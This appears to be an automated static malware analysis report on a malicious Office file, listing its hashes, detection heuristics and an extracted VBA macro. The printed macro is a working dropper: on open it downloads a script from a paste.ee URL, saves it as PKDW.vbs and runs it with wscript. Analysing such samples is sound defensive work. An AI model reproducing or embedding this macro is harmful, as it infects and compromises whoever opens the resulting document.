Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 20eaa4f75016efc1…

MALICIOUS

Office (OOXML)

Size: 17.5 KB. First seen: 2021-04-10
MD5: 135f04622f26c7124dfad0552f3fd29f
SHA-1: 3655dba741573860ff052cc2e0e5d585a2de89fe
SHA-256: 20eaa4f75016efc160ae2f9b73beb5cde8e57856c7d2bc83606a2a9dd670374b
Risk score: 190

Heuristics (6)

  • VBA project inside OOXML (severity: medium; 4 related findings; rule OOXML_VBA)
    Document contains a VBA project: VBA macros are present.
  • Potential Shell call in VBA (severity: critical; rule OLE_VBA_SHELL)
    Potential Shell call in VBA.
    Matched line in script:
    Shell ("wscript PKDW.vbs")
  • VBA downloads and writes a file to disk (severity: critical; rule OLE_VBA_HTTP_DROP_EXEC)
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec and Shell paths, this is a download-and-drop dropper, even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script:
     .write JjBl.responseBody
  • CreateObject call (severity: high; rule OLE_VBA_CREATEOBJ)
    CreateObject call.
    Matched line in script:
     Set JjBl = CreateObject("Microsoft.XMLHTTP")
  • Auto_Open macro (severity: low; rule OLE_VBA_AUTO)
    Auto_Open macro: the code runs automatically when the document is opened.
    Matched line in script:
    Public Sub Auto_Open()
  • Embedded URL (severity: info; rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: https://paste.ee/d/OxThF/0 (referenced by macro)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1061 bytes
SHA-256: 88974c3139f69c3dc1a4504e8b4b3d822b677b5f4888dbd6130c3ac16f3f2f98
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "Módulo1"
Public Sub Auto_Open()
 
 Set JjBl = CreateObject("Microsoft.XMLHTTP")
 Set YoLW = CreateObject("Adodb.Stream")
  
With JjBl
 .Open "GET", "https://paste.ee/d/OxThF/0", False
 .send
End With
 
With YoLW
 .Type = 1
 .Open
 .write JjBl.responseBody
 .savetofile "PKDW.vbs", 2
End With
 
Shell ("wscript PKDW.vbs")
 
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{D0A1A585-CDA5-4A8A-B275-FCE26607F9CC}{B6D80F10-933B-4A57-8E4E-567EBDC053C2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{EF85728B-2834-4A6C-B0E9-D369092343D3}{045A2107-5B4D-4169-B9E2-F5B768339FFF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin | vba-project | OOXML VBA project: ppt/vbaProject.bin | 108032 bytes
SHA-256: 54dfa6ebe141dc3c25230626165f804bc81aeff23ef51e1393acd1683c751aa5